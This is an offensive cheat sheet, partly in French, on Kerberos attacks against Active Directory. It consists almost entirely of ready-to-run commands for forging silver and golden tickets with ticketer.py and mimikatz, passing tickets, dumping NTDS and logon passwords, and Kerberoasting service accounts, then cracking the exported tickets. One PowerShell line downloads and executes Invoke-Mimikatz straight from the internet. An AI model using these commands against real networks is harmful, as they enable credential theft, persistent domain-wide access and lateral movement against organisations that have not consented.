Silver and Golden Tickets

Ticket generation from Linux

# Generate a ticket or convert it (kekeo) to ccache format
$ ticketer.py -nthash <hash> -domain-sid <sid> -domain <domain> <user>

# Export the path in the right variable
$ export KRB5CCNAME=/tmp/ticket.ccache
$ klist

# Exec and use the ticket
$ /impacket/examples/psexec.py -k -n -debug DOMAIN/user@host

# Dump NTDS
$ proxychains secretsdump.py -k -no-pass qsec@DCFIL.PRAMAFIL.CORP -use-vss


Golden Ticket

# Golden Ticket
> Nom du compte administrateur (Administrateur)
> Nom complet du domaine (domain.local)
> SID du domaine (S-1-5-21-1723555596-1415287819-2705645101) [whoami /user]
> Hash NTLM du compte krbtgt (6194bd1a5bf3ecd542e8aac9860bddf0)

mimikatz # privilege:debug
mimikatz # lsadump::lsa /inject /name:krbtgt

mimikatz # kerberos::golden /admin:Administrateur /domain:domain.local /sid:S-1-5-21-1723555596-1415287819-2705645101 /krbtgt:6194bd1a5bf3ecd542e8aac9860bddf0 /ticket:domain.local.kirbi /id:500 /ptt

Use :
mimikatz # kerberos::ptt domain.local.kirbi
mimikatz # kerberos::list
# Resource
https://twitter.com/mpgn_x64/status/1241688547037532161

# Golden ticket and access denied ?
# from cmd (elevated)
> mimikatz kerberos::golden
> klist add_bind <DOMAIN> <DC>
> psexec \\dc\ cmd


Playing with tickets on Windows

# Sessions en cours
mimikatz # sekurlsa::logonpasswords

# Ticket TGT
# Dump SPN
PS C:\> Find-PSServiceAccounts -DumpSPN
Discovering service account SPNs in the AD Domain foo.local
svcSQLServ/pc1.foo.local:1433

# Download Mimikatz
PS C:\> Invoke-Expression (New-Object Net.Webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1')
PS C:\> Invoke-Mimikatz
mimikatz(powershell) # sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)

# Lister les tickets actifs ou les purger
PS C:\> Invoke-Mimikatz -Command '"kerberos::purge"'
PS C:\> Invoke-Mimikatz -Command '"kerberos::list"'
PS C:\> klist

# Demander un ticket
PS C:\> Add-Type -AssemblyName System.IdentityModel
PS C:\> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "svcSQLServ/pc1.foo.local:1433"

# Exporter un ticket
mimikatz # kerberos::list /export

# Crack Ticket
python tgsrepcrack.py wordlist.txt ticket.kirbi